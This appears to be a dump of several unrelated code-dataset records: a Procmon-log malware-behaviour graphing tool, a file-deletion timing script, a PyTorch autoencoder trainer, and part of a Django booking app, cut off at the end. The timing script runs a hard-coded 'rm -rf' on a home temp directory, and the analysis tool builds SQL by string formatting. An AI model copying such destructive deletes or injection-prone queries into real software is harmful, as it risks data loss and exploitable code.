set()\n self.rootProcessname = 'malicious.exe'\n\n self.timeline = dict()\n self.process = dict()\n self.threads = dict()\n self.files = dict()\n self.edges = dict()\n\n # DO NOT CHANGE #\n self.result_path = './results/'\n self.output_d3 = 'process.json' # required by index HTML\n\n @staticmethod\n def get_uuid():\n return str(uuid.uuid4())\n\n def add_thread_id_to_set(self, thread_id):\n self.all_thread_ids.add(thread_id)\n\n def get_thread_id_from_details(self, rows):\n for row in rows:\n detail = row[3]\n new_tid = detail.split(':')[1].strip()\n self.get_threads_created_by_thread(new_tid)\n\n def get_threads_created_by_process(self, proc_id):\n \"\"\"get created threads for a given process\"\"\"\n query = \"SELECT \" \\\n \"`procname`, \" \\\n \"`pid`, \" \\\n \"`tid`, \" \\\n \"`detail` \" \\\n \"FROM `{table}` \" \\\n \"WHERE `pid` = {pid} \" \\\n \"AND `operation` = 'Thread Create' \" \\\n \"AND `result` = 'SUCCESS'\".format(table=self.tablename, pid=proc_id)\n\n rowcount, rows = self.query(query)\n self.get_thread_id_from_details(rows)\n\n def get_threads_created_by_thread(self, thread_id):\n \"\"\"get created threads for a given thread\"\"\"\n self.add_thread_id_to_set(thread_id)\n\n query = \"SELECT \" \\\n \"`procname`, \" \\\n \"`pid`, \" \\\n \"`tid`, \" \\\n \"`detail` \" \\\n \"FROM `{table}` \" \\\n \"WHERE `tid` = {tid} \" \\\n \"AND `operation` = 'Thread Create' \" \\\n \"AND `result` = 'SUCCESS'\".format(table=self.tablename, tid=thread_id)\n\n rowcount, rows = self.query(query)\n self.get_thread_id_from_details(rows)\n\n def get_created_processes(self, pid):\n \"\"\"get created processes for a given process\"\"\"\n query = \"SELECT procname, \" \\\n \"pid, \" \\\n \"tid, \" \\\n \"detail \" \\\n \"FROM `{table}` \" \\\n \"WHERE pid={pid} \" \\\n \"AND operation = 'Process Create' \" \\\n \"AND result = 'SUCCESS'\".format(table=self.tablename, pid=pid)\n\n rowcount, rows = self.query(query)\n\n for row in rows:\n detail = str(row[3]).split(',')\n new_pid = detail[0].split(':')[1].strip()\n self.get_all_created_processes_and_threads(new_pid)\n\n def get_all_created_processes_and_threads(self, pid):\n \"\"\"get created processes and threads\"\"\"\n self.get_created_processes(pid)\n self.get_threads_created_by_process(pid)\n\n def prepare_raw_data(self):\n \"\"\"query all necessary information\"\"\"\n\n all_thread_ids = str('\\'' + '\\',\\''.join(self.all_thread_ids) + '\\'')\n # TODO[14/11/2016][bl4ckw0rm] integrate time in query - results in a lot more rows\n query = \"SELECT DISTINCT(`operation`), \" \\\n \"`procname`, \" \\\n \"`pid`, \" \\\n \"IF(`operation` = 'Process Create', SUBSTRING_INDEX(SUBSTRING_INDEX(`detail`, ',', 1), ':', -1), '') AS newpid, \" \\\n \"`tid`, \" \\\n \"IF(`operation` = 'Thread Create', SUBSTRING_INDEX(`detail`, ':', -1), '') AS newtid, \" \\\n \"IF(LOCATE('Read Data/List Directory', `detail`) > 0, 1, 0) AS isDir, \" \\\n \"IF(LOCATE('Non-Directory File', `detail`) > 0, 1, 0) AS isFile, \" \\\n \"`path`, \" \\\n \"SUBSTRING_INDEX(`path`, '\\\\\\\\', -1) AS filename, \" \\\n \"IF(`operation` = 'Process Create', REPLACE(SUBSTRING_INDEX(`detail`, '\\\\\\\\', -1), '\\\"', ''), '') as cmd \" \\\n \"FROM `{table}` \" \\\n \"WHERE ( `operation` IN \" \\\n \"( 'SetDispositionInformationFile', 'WriteFile', 'SetBasicInformationFile', 'Process Create', \" \\\n \"'Thread Create', 'RegSetValue') \" \\\n \"OR ( `operation` = 'CreateFile' \" \\\n \"AND TRIM(SUBSTRING_INDEX(SUBSTRING(`detail`, LOCATE('OpenResult', `detail`)), ':', -1)) = 'Created' \" \\\n \"AND LOCATE('Non-Directory File', `detail`) > 0 ) \" \\\n \"OR ( `operation` = 'Process Start' \" \\\n \"AND `pid` = '{pid}' )) \" \\\n \"AND `result` = 'SUCCESS' \" \\\n \"AND ( `pid` = '{pid}' \" \\\n \"OR `tid` IN ({tids})) \" \\\n \"ORDER BY `id`\".format(table=self.tablename, tids=all_thread_ids, pid=self.root_pid)\n\n rowcount, rows = self.query(query)\n\n index = 0\n for row in rows:\n operation = str(row[0]).strip()\n proc_name = str(row[1]).strip()\n proc_id = str(row[2]).strip()\n new_proc_id = str(row[3]).strip()\n thread_id = str(row[4]).strip()\n new_thread_id = str(row[5]).strip()\n is_directory = row[6]\n is_file = row[7]\n path = str(row[8]).strip()\n file_name = str(row[9]).strip()\n proc_cmd = str(row[10]).strip()\n\n # store all in data\n index += 1 # we use index, adapt to time or id later\n self.timeline[index] = {\n 'operation': operation,\n 'proc_name': proc_name,\n 'proc_id': proc_id,\n 'new_proc_id': new_proc_id,\n 'thread_id': thread_id,\n 'new_thread_id': new_thread_id,\n 'is_dir': is_directory,\n 'is_file': is_file,\n 'path': path,\n 'file_name': file_name,\n 'proc_cmd': proc_cmd,\n }\n\n # 'root' process in separate color\n color = GraphColors.NODE_PROCESSITEM\n if proc_name == self.rootProcessname:\n color = GraphColors.NODE_MALICIOUSPROC\n\n # process dict\n if proc_id not in self.process.keys():\n self.process[proc_id] = {\n 'name': proc_name,\n 'label': proc_name,\n 'type': 'process',\n 'color': color,\n 'id': self.get_uuid(),\n 'pid': proc_id,\n 'tid': [\n thread_id\n ],\n 'links': [],\n 'status': 'new'\n }\n else:\n if thread_id and thread_id not in self.process[proc_id]['tid']:\n self.process[proc_id]['tid'].append(thread_id)\n\n if new_thread_id and new_thread_id not in self.process[proc_id]['tid']:\n self.process[proc_id]['tid'].append(new_thread_id)\n\n # thread dict\n # insert tid\n if thread_id not in self.threads.keys():\n self.threads[thread_id] = {\n 'name': thread_id,\n 'label': thread_id,\n 'type': 'thread',\n 'color': GraphColors.NODE_THREADITEM,\n 'id': self.get_uuid(),\n 'pid': [\n proc_id\n ],\n 'links': [],\n 'status': 'new'\n }\n else:\n if proc_id not in self.threads[thread_id]['pid']:\n self.threads[thread_id]['pid'].append(proc_id)\n\n # insert ntid\n if new_thread_id:\n if new_thread_id not in self.threads.keys():\n self.threads[new_thread_id] = {\n 'name': new_thread_id,\n 'label': new_thread_id,\n 'type': 'thread',\n 'color': GraphColors.NODE_THREADITEM,\n 'id': self.get_uuid(),\n 'pid': [\n proc_id\n ],\n 'links': [],\n 'status': 'new'\n }\n else:\n if proc_id not in self.threads[new_thread_id]['pid']:\n self.threads[new_thread_id]['pid'].append(proc_id)\n\n # file dict\n if file_name:\n if file_name not in self.files.keys():\n self.files[file_name] = {\n 'name': file_name,\n 'label': file_name,\n 'type': 'file',\n 'color': GraphColors.NODE_FILEITEM,\n 'id': self.get_uuid(),\n 'pid': [\n proc_id\n ],\n 'links': [],\n 'status': 'new'\n }\n else:\n if proc_id not in self.files[file_name]['pid']:\n self.files[file_name]['pid'].append(proc_id)\n\n # file dict\n if proc_cmd:\n tmp_filename = re.split(' ', proc_cmd, maxsplit=1)[0]\n\n if tmp_filename not in self.files.keys():\n self.files[tmp_filename] = {\n 'name': tmp_filename,\n 'label': tmp_filename,\n 'type': 'file',\n 'color': GraphColors.NODE_FILEITEM,\n 'id': self.get_uuid(),\n 'pid': [\n proc_id\n ],\n 'links': [],\n 'status': 'new'\n }\n else:\n if proc_id not in self.files[tmp_filename]['pid']:\n self.files[tmp_filename]['pid'].append(proc_id)\n\n def insert_edge(self, source, target, value, color):\n \"\"\"insert edge\"\"\"\n edge_id = self.get_uuid()\n self.edges[edge_id] = {\n 'source': source['id'],\n 'target': target['id'],\n 'value': value,\n 'color': color,\n 'status': 'new'\n }\n\n # insert link count to node\n if source['type'] == 'process':\n self.process[source['key']]['links'].append(edge_id)\n\n if source['type'] == 'thread':\n self.threads[source['key']]['links'].append(edge_id)\n\n if source['type'] == 'file':\n self.files[source['key']]['links'].append(edge_id)\n\n if target['type'] == 'process':\n self.process[target['key']]['links'].append(edge_id)\n\n if target['type'] == 'thread':\n self.threads[target['key']]['links'].append(edge_id)\n\n if target['type'] == 'file':\n self.files[target['key']]['links'].append(edge_id)\n\n def link_data(self):\n for index, item in self.timeline.iteritems():\n operation = item['operation']\n thread_id = str(item['thread_id']).strip()\n proc_id = str(item['proc_id']).strip()\n new_proc_id = str(item['new_proc_id']).strip()\n new_thread_id = str(item['new_thread_id']).strip()\n file_name = item['file_name']\n proc_name = item['proc_name']\n is_file = item['is_file']\n proc_cmd = item['proc_cmd']\n\n \"\"\"\n # set file information / date spoof etc.\n if v[\"operation\"] == \"SetBasicInformationFile\" :\n\n #print json.dumps(v, indent=2)\n\n source_thread = threads[tid][\"id\"]\n target_file = files[filename][\"id\"]\n\n insertEdge({\n \"id\" : source_thread,\n \"key\" : tid,\n \"type\" : \"thread\"},\n { \"id\" : target_file,\n \"key\" : filename,\n \"type\" : \"file\"},\n 1, colorSetFileInfo)\n \"\"\"\n\n # create file\n # directories currently not included\n if operation == 'CreateFile':\n if is_file:\n source_thread = self.threads[thread_id]['id']\n target_file = self.files[file_name]['id']\n\n self.insert_edge({\n 'id': source_thread,\n 'key': thread_id,\n 'type': 'thread'},\n {'id': target_file,\n 'key': file_name,\n 'type': 'file'},\n 1, GraphColors.EDGE_FILECREATE)\n\n # delete file\n if operation == 'SetDispositionInformationFile':\n source_thread = self.threads[thread_id]['id']\n target_file = self.files[file_name]['id']\n\n self.insert_edge({\n 'id': source_thread,\n 'key': thread_id,\n 'type': 'thread'},\n {'id': target_file,\n 'key': file_name,\n 'type': 'file'},\n 1, GraphColors.EDGE_FILEDELETE)\n\n # write file\n if operation == 'WriteFile':\n source_thread = self.threads[thread_id]['id']\n target_file = self.files[file_name]['id']\n\n self.insert_edge({\n 'id': source_thread,\n 'key': thread_id,\n 'type': 'thread'},\n {'id': target_file,\n 'key': file_name,\n 'type': 'file'},\n 1, GraphColors.EDGE_FILEWRITE)\n\n # process create\n if operation == 'Process Create':\n self.threads[thread_id]['procstart'] = 'true'\n\n cmd = re.split(' ', proc_cmd, maxsplit=1)\n self.threads[self.process[new_proc_id]['tid'][0]]['cmd'] = cmd[0]\n if len(cmd) > 1:\n self.threads[self.process[new_proc_id]['tid'][0]]['parameter'] = cmd[1]\n\n source_thread = self.threads[self.process[new_proc_id]['tid'][0]]['id']\n target_file = self.files[self.threads[self.process[new_proc_id]['tid'][0]]['cmd']]['id']\n\n self.insert_edge({\n 'id': source_thread,\n 'key': self.process[new_proc_id]['tid'][0],\n 'type': 'thread'},\n {'id': target_file,\n 'key': cmd[0],\n 'type': 'file'},\n 1, GraphColors.EDGE_FILEHANDLE)\n\n # link thread with created process\n source_thread = self.threads[thread_id]['id']\n target_process = self.process[new_proc_id]['id']\n\n self.insert_edge({\n 'id': source_thread,\n 'key': thread_id,\n 'type': 'thread'},\n {'id': target_process,\n 'key': new_proc_id,\n 'type': 'process'},\n 1, GraphColors.EDGE_PROCESS)\n\n # thread create\n if operation == 'Thread Create':\n\n pid_orig = self.threads[thread_id]['pid'][0] # initial pid / first pid found in trace\n started = self.threads[thread_id].get('procstart', False) # was thread created during process start?\n\n # injected threads\n if self.threads[thread_id]['pid']:\n if proc_id != pid_orig and not started:\n source_inject = self.threads[thread_id]['id']\n target_inject = self.threads[new_thread_id]['id']\n\n self.insert_edge({\n 'id': source_inject,\n 'key': thread_id,\n 'type': 'thread'},\n {'id': target_inject,\n 'key': new_thread_id,\n 'type': 'thread'},\n 1, GraphColors.EDGE_INJECT)\n\n # link processes and threads\n if self.threads.get(new_thread_id, False):\n source = self.process[proc_id]['id']\n target = self.threads[new_thread_id]['id']\n\n self.insert_edge({\n 'id': source,\n 'key': proc_id,\n 'type': 'process'},\n {'id': target,\n 'key': new_thread_id,\n 'type': 'thread'},\n 1, GraphColors.EDGE_THREAD)\n\n # link processes and files\n if self.files.get(proc_name, False):\n source_file = self.files[proc_name]['id']\n target_process = self.process[proc_id]['id']\n\n self.insert_edge({\n 'id': source_file,\n 'key': proc_name,\n 'type': 'file'},\n {'id': target_process,\n 'key': proc_id,\n 'type': 'process'},\n 1, GraphColors.EDGE_PROCESS)\n\n def cleanup_d3(self):\n for container in [self.files, self.threads, self.process]:\n for key, node in container.items():\n # delete unlinked nodes\n if not node['links']:\n node['status'] = 'DELETE'\n # delete node/thread with one edge\n if node['type'] == 'thread' and len(node['links']) == 1:\n node['status'] = 'DELETE'\n # delete attached edge\n self.edges[node['links'][0]]['status'] = 'DELETE'\n\n def write_d3(self):\n \"\"\"write as CSV and JSON\"\"\"\n output = {\n 'nodes': [],\n 'links': []\n }\n\n # insert nodes to d3 output structure\n for container in [self.process, self.threads, self.files]:\n for key, item in container.iteritems():\n if not item['status'] is 'DELETE':\n output['nodes'].append(item)\n\n # insert links to d3 output structure\n for key, value in self.edges.items():\n if not value['status'] is 'DELETE':\n output['links'].append(value)\n\n # change each link's source and target value to corresponding array index\n for link in output['links']:\n index = 0\n source = link['source']\n target = link['target']\n\n for node in output['nodes']:\n if node['id'] == source:\n link['source'] = index\n if node['id'] == target:\n link['target'] = index\n index += 1\n\n # write output to file in json format\n self.write_json_to_file(self.output_d3, output)\n\n def write_json_to_file(self, filename, data):\n \"\"\"write some data to file in json format\"\"\"\n with open(self.result_path + filename, 'wb') as out_file:\n out_file.write(json.dumps(data, indent=4))\n\n def query_pid_process_start(self):\n query = \"SELECT pid FROM `{table}` where procname = '{processname}' and operation = 'Process Start'\".format(\n table=self.tablename, processname=self.rootProcessname)\n rowcount, rows = self.query(query)\n return rows[0][0]\n\n def ask_for_process_name(self):\n pass\n\n def do_analyse(self):\n\n # select only first occurrence from malicious.exe\n self.root_pid = self.query_pid_process_start()\n\n self.get_all_created_processes_and_threads(self.root_pid)\n self.prepare_raw_data()\n self.link_data()\n self.cleanup_d3()\n self.write_d3()\n\n return True\n","sub_path":"malwrlyse/packages/modules/analyser.py","file_name":"analyser.py","file_ext":"py","file_size_in_byte":20670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"122066652","text":"import numpy as np\nimport datetime\nimport os, sys, subprocess\nfrom glob import glob\n\nimport multiprocessing as mp\n\ndef touch(fpath, times=None):\n fhandle = open(fpath, 'a')\n try:\n os.utime(fpath, times)\n finally:\n fhandle.close()\n\ndef make_many_files(N_files=1000):\n\n # first, make many files\n tempdir = '/home/luke/temp/'\n if not os.path.exists(tempdir):\n os.mkdir(tempdir)\n\n fpaths = []\n for f in range(0,N_files):\n fpath = os.path.join(tempdir,str(f)+'.txt')\n touch(fpath)\n fpaths.append(fpath)\n\n return fpaths\n\ndef _touch_worker(task):\n f = task\n touch(fpath)\n\n\ndef parallel_make_many_files(N_files=1000, nworkers=16, maxworkertasks=1000):\n\n # first, make many files\n tempdir = '/home/luke/temp/'\n if not os.path.exists(tempdir):\n os.mkdir(tempdir)\n\n tasks = [os.path.join(tempdir,str(f)+'.txt') for f in range(0,N_files)]\n\n fpaths = tasks\n\n pool = mp.Pool(nworkers,maxtasksperchild=maxworkertasks)\n results = pool.map(_touch_worker, tasks)\n\n pool.close()\n pool.join()\n\n return fpaths\n\n\n\ndef chunks_generator(l, n):\n \"\"\"Yield successive n-sized chunks from l\"\"\"\n for i in range(0, len(l), n):\n max_ind = i+n\n if max_ind > len(l) -1:\n max_ind = len(l)\n yield l[i:max_ind], i, max_ind\n\n\ndef _rm_chunk_worker(task):\n # given a list of <~ 10,000 file names (and start/end inds for verbosity),\n # remove them.\n chunkfiles, i, max_ind = task\n\n fpathstr = ' '.join(chunkfiles)\n cmdtorun = 'rm {}'.format(fpathstr)\n subprocess.run(cmdtorun.split(' '))\n\n print('rm {} to {}...'.format(i, max_ind))\n\n return 1\n\n\ndef rm_named_files(filepaths, N_chunk=int(1e4), nworkers=1, maxworkertasks=1000):\n \"\"\"\n given a list of files, delete them.\n\n under the hood:\n * if you have <=1e4 files, does a simple long-form rm call.\n * if you have >1e4 files, splits the list of files into chunks, does\n multiple long-form rm calls.\n \"\"\"\n\n N_to_rm = len(filepaths)\n\n if not isinstance(filepaths,list):\n raise AssertionError\n\n if N_to_rm <= N_chunk:\n\n subprocess.run(['rm']+filepaths)\n\n print('called rm on {} files'.format(N_to_rm))\n\n elif N_to_rm > N_chunk and nworkers==1:\n\n for chunkfiles, i, max_ind in chunks_generator(filepaths, N_chunk):\n\n print('rm {} to {}...'.format(i, max_ind))\n\n fpathstr = ' '.join(chunkfiles)\n cmdtorun = 'rm {}'.format(fpathstr)\n subprocess.run(cmdtorun.split(' '))\n\n print('called rm on {} files'.format(N_to_rm))\n\n elif N_to_rm > N_chunk and nworkers > 1:\n\n # make a list of the chunks/sublists (these will be \"tasks\").\n tasks = []\n for chunkfiles, i, max_ind in chunks_generator(filepaths, N_chunk):\n tasks.append((chunkfiles, i, max_ind))\n\n pool = mp.Pool(nworkers,maxtasksperchild=maxworkertasks)\n results = pool.map(_rm_chunk_worker, tasks)\n\n pool.close()\n pool.join()\n\n print('called rm on {} files'.format(N_to_rm))\n\n return 1\n\n\ndef main():\n\n # make files, delete them individually by passing them all thru rm\n for N_files in list(map(int,[1e3,1e4,9.8e4])):\n\n # make files, delete them by directory removal\n fpaths = parallel_make_many_files(N_files=N_files)\n cmdtorun = 'rm -rf /home/luke/temp'\n t0 = datetime.datetime.now()\n returncode = os.system(cmdtorun)\n t1 = datetime.datetime.now()\n tdelt = (t1-t0).total_seconds()\n print('rm -rf directory, {} files: {} seconds'.format(N_files, tdelt))\n\n # make files, delete them individually by passing them all thru rm\n nworkers = 1\n fpaths = parallel_make_many_files(N_files=N_files)\n t0 = datetime.datetime.now()\n rm_named_files(fpaths, N_chunk=int(2e4), nworkers=nworkers)\n t1 = datetime.datetime.now()\n tdelt = (t1-t0).total_seconds()\n print('rm INDIVIDUAL files {} worker, {} files: {} seconds'.\n format(nworkers, N_files, tdelt))\n\n # same but multithread\n nworkers = 16\n fpaths = parallel_make_many_files(N_files=N_files)\n t0 = datetime.datetime.now()\n rm_named_files(fpaths, N_chunk=int(2e4), nworkers=nworkers)\n t1 = datetime.datetime.now()\n tdelt = (t1-t0).total_seconds()\n print('rm INDIVIDUAL files {} workers, {} files: {} seconds'.\n format(nworkers, N_files, tdelt))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"rm_timing_experiments/removal_calls.py","file_name":"removal_calls.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"397683587","text":"import argparse\nimport json\nimport os\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\n\nimport logger\nfrom image_folder import ImageFolder720p\nfrom models.cae_32x32x32_zero_pad_bin import CAE\nfrom utils import save_imgs\n\n\ndef train(cfg):\n\tos.makedirs(f\"out/{cfg['exp_name']}\", exist_ok=True)\n\tos.makedirs(f\"checkpoints/{cfg['exp_name']}\", exist_ok=True)\n\n\t# dump config for current experiment\n\twith open(f\"checkpoints/{cfg['exp_name']}/setup.cfg\", \"wt\") as f:\n\t\tfor k, v in cfg.items():\n\t\t\tf.write(\"%15s: %s\\n\" % (k, v))\n\n\tmodel = CAE().cuda()\n\n\tif cfg['load']:\n\t\tmodel.load_state_dict(torch.load(cfg['chkpt']))\n\t\tlogger.info(\"Loaded model from\", cfg['chkpt'])\n\n\tmodel.train()\n\tlogger.info(\"Done setup model\")\n\n\tdataset = ImageFolder720p(cfg['dataset_path'])\n\tdataloader = DataLoader(\n\t\tdataset, batch_size=cfg['batch_size'], shuffle=cfg['shuffle'], num_workers=cfg['num_workers']\n\t)\n\tlogger.info(f\"Done setup dataloader: {len(dataloader)} batches of size {cfg['batch_size']}\")\n\n\tmse_loss = nn.MSELoss()\n\tadam = torch.optim.Adam(model.parameters(), lr=cfg['learning_rate'], weight_decay=1e-5)\n\tsgd = torch.optim.SGD(model.parameters(), lr=cfg['learning_rate'])\n\n\toptimizer = adam\n\n\tra = 0\n\n\tfor ei in range(cfg['resume_epoch'], cfg['num_epochs']):\n\t\tfor bi, (img, patches, _) in enumerate(dataloader):\n\n\t\t\tavg_loss = 0\n\t\t\tfor i in range(6):\n\t\t\t\tfor j in range(10):\n\t\t\t\t\tx = Variable(patches[:, :, i, j, :, :]).cuda()\n\t\t\t\t\ty = model(x)\n\t\t\t\t\tloss = mse_loss(y, x)\n\n\t\t\t\t\tavg_loss += (1 / 60) * loss.item()\n\n\t\t\t\t\toptimizer.zero_grad()\n\t\t\t\t\tloss.backward()\n\t\t\t\t\toptimizer.step()\n\n\t\t\tra = avg_loss if bi == 0 else ra * bi / (bi + 1) + avg_loss / (bi + 1)\n\n\t\t\tlogger.debug(\n\t\t\t\t'[%3d/%3d][%5d/%5d] avg_loss: %f, ra: %f' %\n\t\t\t\t(ei + 1, cfg['num_epochs'], bi + 1, len(dataloader), avg_loss, ra)\n\t\t\t)\n\n\t\t\t# save img\n\t\t\tif bi % cfg['out_every'] == 0:\n\t\t\t\tout = torch.zeros(6, 10, 3, 128, 128)\n\t\t\t\tfor i in range(6):\n\t\t\t\t\tfor j in range(10):\n\t\t\t\t\t\tx = Variable(patches[0, :, i, j, :, :].unsqueeze(0)).cuda()\n\t\t\t\t\t\tout[i, j] = model(x).cpu().data\n\n\t\t\t\tout = np.transpose(out, (0, 3, 1, 4, 2))\n\t\t\t\tout = np.reshape(out, (768, 1280, 3))\n\t\t\t\tout = np.transpose(out, (2, 0, 1))\n\n\t\t\t\ty = torch.cat((img[0], out), dim=2).unsqueeze(0)\n\t\t\t\tsave_imgs(imgs=y, to_size=(3, 768, 2 * 1280), name=f\"out/{cfg['exp_name']}/out_{ei}_{bi}.png\")\n\n\t\t\t# save model\n\t\t\tif bi % cfg['save_every'] == cfg['save_every'] - 1:\n\t\t\t\ttorch.save(model.state_dict(), f\"checkpoints/{cfg['exp_name']}/model_{ei}_{bi}.state\")\n\n\t# save final model\n\ttorch.save(model.state_dict(), f\"checkpoints/{cfg['exp_name']}/model_final.state\")\n\n\ndef main(args):\n\ttrain(cfg=json.load(open(args.cfg, \"rt\")))\n\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--cfg', type=str, required=True)\n\tmain(parser.parse_args())\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"649689856","text":"#MOONBAY\n# Create your views here.\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom .models import User\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nfrom book.forms import UserForm, ProfessionalsForm, RecruitersForm, GPForm, HDForm,OHForm, SpecialtiesForm, SpecialistForm, PostForm, DateForm, ShortPostForm, LongPostForm, LoginForm\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.views import generic\nfrom django.views.generic import View\nfrom book.models import User, Professionals, Recruiters, Specialties, Specialists, Post, Date, Taken_Post\nfrom django.forms import formset_factory\nfrom django.shortcuts import get_object_or_404, get_list_or_404\nfrom django.http import JsonResponse\n\ndef index(request):\n\tposts_list = Date.objects.filter(is_taken=False).select_related('post')\n\treturn render(request, 'book/posts_list.html', {'posts_list': posts_list, 'error_message':\"Currently, there are no posts.\",})\n\nclass UserRegistration(View):\n\tuserform = UserForm\n\tprofessionalsform = ProfessionalsForm\n\trecruitersform = RecruitersForm\n\tohform = OHForm\n\thdform = HDForm\n\tspecialtiesform = SpecialtiesForm\n\tspecialistform = SpecialistForm\n\n\t# display blank form\n\tdef get(self, request):\n\t\tuserform = self.userform(None)\n\t\tprofessionalsform = self.professionalsform(None)\n\t\trecruitersform = self.recruitersform(None)\n\t\tohform = self.ohform(None)\n\t\thdform = self.hdform(None)\n\t\tspecialtiesform = self.specialtiesform(None)\n\t\tspecialistform = self.specialistform(None)\n\t\treturn render(request, 'book/form2.html', {'userform': userform, 'professionalsform': professionalsform, 'recruitersform': recruitersform, 'hdform': hdform, 'ohform': ohform,'specialtiesform': specialtiesform, 'specialistform': specialistform})\n\n\t# process form data\n\tdef post(self, request):\n\t\tuserform = self.userform(request.POST) \n\t\tprofessionalsform = self.professionalsform(request.POST)\n\t\trecruitersform = self.recruitersform(request.POST)\n\t\thdform = self.hdform(request.POST)\n\t\tohform = self.ohform(request.POST)\n\t\tspecialtiesform = self.specialtiesform(request.POST)\n\t\tspecialistform = self.specialistform(request.POST)\n\t\t\n\t\t# validate\n\t\tuser_valid = userform.is_valid()\n\t\tprofessional_valid = professionalsform.is_valid()\n\t\trecruiter_valid = recruitersform.is_valid()\n\t\thd_valid = hdform.is_valid()\n\t\toh_valid = ohform.is_valid()\n\t\tspecialty_valid = specialtiesform.is_valid()\n\t\tspecialist_valid = specialistform.is_valid()\n\n\t\tif user_valid:\n\t\t\tuser = userform.save(commit=False)\n\t\t\temail = userform.cleaned_data['email']\n\t\t\tpassword = userform.cleaned_data['password']\n\t\t\tuser.set_password(password)\n\t\t\tuser.save()\n\n\t\t\tuser = authenticate(request, email=email, password=password)\n\n\t\t\tif professional_valid:\n\t\t\t\tprofessional = professionalsform.save(commit=False)\n\t\t\t\tprofessional.cancellations = 0\n\t\t\t\tprofessional.bookings = 0\n\t\t\t\tprofessional.professional_user_id = user\n\t\t\t\tprofessional.save()\n\t\n\t\t\t\tif hd_valid is not None and user.profession == \"Doctor\":\n\t\t\t\t\thd = hdform.save(commit=False)\n\t\t\t\t\thd.hd_license_number = professional\n\t\t\t\t\thd.save()\n\t\t\t\t\n\t\t\t\tif oh_valid is not None and user.profession == \"Doctor\":\n\t\t\t\t\toh = ohform.save(commit=False)\n\t\t\t\t\toh.oh_license_number = professional\n\t\t\t\t\toh.save()\n\n\t\t\t\tif specialty_valid:\n\t\t\t\t\tspecialty = specialtiesform.save(commit=False)\n\t\t\t\t\tspecialty.save()\n\n\t\t\t\t\tif specialist_valid:\n\t\t\t\t\t\tspecialist = specialistform.save(commit=False)\n\t\t\t\t\t\tspecialist.license_number = professional\n\t\t\t\t\t\tspecialist.specialty = specialty\n\t\t\t\t\t\tspecialist.save()\n\n\t\t\t\tlogin(request, user)\n\t\t\t\treturn redirect('post_list')\n\t\t\t\t\n\t\t\tif recruiter_valid:\n\t\t\t\trecruiter = recruitersform.save(commit=False)\n\t\t\t\trecruiter.recruiter_user_id = user\n\t\t\t\trecruiter.save()\n\t\t\t\t\n\t\t\t\tlogin(request, user)\n\t\t\t\treturn redirect('post_list')\n\n\t\treturn render(request, 'book/form2.html', {'userform': userform, 'professionalsform': professionalsform, 'recruitersform': recruitersform, 'hdform': hdform, 'ohform': ohform,'specialtiesform': specialtiesform, 'specialistform': specialistform})\n\nclass login_view(View):\n\tloginform = LoginForm\n\n\tdef get(self,request):\n\t\tloginform = self.loginform(None)\n\t\treturn render(request, 'book/login.html', {'loginform':loginform})\n\n\tdef post(self,request):\n\t\tloginform = self.loginform(request.POST)\n\n\t\tlogin_valid = loginform.is_valid()\n\n\t\tif login_valid:\n\t\t\temail = loginform.cleaned_data['email']\n\t\t\tpassword = loginform.cleaned_data['password']\n\n\t\t\tuser = authenticate(request, email=email, password=password)\n\n\t\t\tif user is not None:\n\t\t\t\tlogin(request,user)\n\t\t\t\t\n\t\t\t\treturn redirect('post_list')\n\n\t\treturn render(request, 'book/login.html', {'loginform':loginform})\n\ndef logout_view(request):\n\tlogout(request)\n\treturn redirect('login')\n\ndef create_post(request, method=\"POST\"):\n\tShortPostFormSet = formset_factory(ShortPostForm, extra=2, max_num=10, can_delete=True)\n\tLongPostFormSet = formset_factory(LongPostForm, extra=2, max_num=10, can_delete=True)\n\tif request.method == \"GET\":\n\t\tpost_form = PostForm(request.GET or None)\n\t\tshortformset = ShortPostFormSet(request.GET or None, prefix='short')\n\t\tlongformset = LongPostFormSet(request.GET or None, prefix='long')\n\telif request.method == \"POST\":\n\t\tpost_form = PostForm(request.POST)\n\t\tshortformset = ShortPostFormSet(request.POST, prefix='short')\n\t\tlongformset = LongPostFormSet(request.POST, prefix='long')\n\n\t\tif post_form.is_valid():\n\t\t\tpost = post_form.save()\n\n\t\t\tif shortformset.is_valid():\n\t\t\t\tfor form in shortformset:\n\t\t\t\t\tselector = form.cleaned_data['selector']\n\t\t\t\t\tmale_total = form.cleaned_data['male_number']\n\t\t\t\t\tfemale_total = form.cleaned_data['female_number']\n\t\t\t\t\tstart_date = form.cleaned_data['start_date']\n\t\t\t\t\tend_date = form.cleaned_data['end_date']\n\t\t\t\t\tstart_time = form.cleaned_data['start_time']\n\t\t\t\t\tend_time = form.cleaned_data['end_time']\n\t\t\t\t\ttotal_hours = form.cleaned_data['total_hours']\n\t\t\t\t\tsalary = form.cleaned_data['salary']\n\t\t\t\t\tnet_rate = form.cleaned_data['net_rate']\n\t\t\t\t\tx = 0\n\t\t\t\t\ty = 0\n\t\t\t\t\tz = 0 \n\t\t\t\t\tif selector == \"OR\":\n\t\t\t\t\t\t#create an initial date instance w/c is to be copied if male > 1\n\t\t\t\t\t\t#iterate thru male_total then create post each time\n\n\t\t\t\t\t\twhile x < male_total:\n\t\t\t\t\t\t\tdate = Date(\n\t\t\t\t\t\t\t\tpost = post, \n\t\t\t\t\t\t\t\tsex_of_professional = \"Male/Female\",\n\t\t\t\t\t\t\t\tstart_date = start_date,\n\t\t\t\t\t\t\t\tend_date = end_date,\n\t\t\t\t\t\t\t\tstart_time = start_time,\n\t\t\t\t\t\t\t\tend_time = end_time,\n\t\t\t\t\t\t\t\ttotal_hours = total_hours,\n\t\t\t\t\t\t\t\tsalary = 